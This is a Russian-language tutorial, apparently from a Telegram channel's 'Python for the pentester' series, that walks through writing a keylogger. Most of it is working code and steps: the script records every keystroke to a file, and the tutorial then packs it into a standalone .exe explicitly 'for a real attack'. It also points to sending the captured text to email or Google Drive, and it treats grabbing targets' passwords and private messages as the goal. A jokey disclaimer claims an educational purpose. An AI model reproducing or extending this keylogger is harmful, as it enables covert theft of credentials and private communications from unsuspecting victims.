#3 Python для пентестера: создание своего KeyLogger

Создано для: https://t.me/E7TEAM

Введение:

В этой статье мы создадим свой KeyLogger исключительно с помощью Python и библиотеки KeyBoard!

Что такое KeyLogger?

KeyLogger называют программу способную запоминать любые нажатия клавиш совершенные пользователем. Так в теории можно получить пароли и личные сообщения введенные целью.

Для чего он нужен?

KeyLogger часто используется компаниями для отслеживания занятий сотрудников за рабочим местом. Но программа может использоваться и в плохих целях. Сегодня мы на примере покажем как легко злоумышленник может получить данные с помощью простой программы

В нашей программе будет реализована сохранение данных на рабочий стол, но в реальных атаках используется отсылка данных на Email или на Google Drive

Основное:

Для нашей программы нам понадобится библиотека keyboard, установим с помощью pip:

pip install keyboard

Теперь создаем новый файл - keylogger.py, импортируем туда нашу библиотеку keyboard:

import keyboard

Теперь создадим функцию которая будет засекать каждое нажатие клавиши и вызывать функцию ее сохранения:

def keylogger():
    keyboard.hook(keylogger_callback) #показываем куда отправлять перехваченные данные
    keyboard.wait() #ждем данные

Теперь сама функция сохранения:

def keylogger_callback(event):
    if event.event_type == 'up': #подтверждаем завершение нажатия
            #пишем нажатие в файл       
            with open('keylog.txt', 'a') as f:            
            f.write(event.name + '\n')
keylogger()

Запустив программу в локальной папке появится файл keylog.txt, где будут все клавиши которые мы нажали.

Но толку от python скрипта в реальной атаке? Давайте скомпилируем его в exe

Установим auto-py-to-exe через pip:

pip install auto-py-to-exe

Теперь в терминале набираем auto-py-to-exe и видим такое окошко:

Вводим путь к файлу и выбираем настройки как на скрине, нажимаем кнопку конвертации.

По окончанию жмем "Открыть папку ввода"

И увидим файл keylogger.exe, после запуска начинаем печатать и появляется keylog.txt! Мы создали свою программу по перехвату сообщений!

Вывод:

Python как мы убедились может создавать мощные программы для перехвата и взлома данных, keylogger созданный нами тому пример. При желании можно доделать его и отправлять все текста себе на почту, но это уже тема для отдельной статьи :)

Внимание! Вся информация строго в ознакомительно-познавательных целях. Автор данной статьи, а также ресурс на котором он размещает данную статью, не несут ответственности за любые последствия от ее прочтения, а также за ваше плохое самочувствие, детей - двоечников и долги по ипотеке.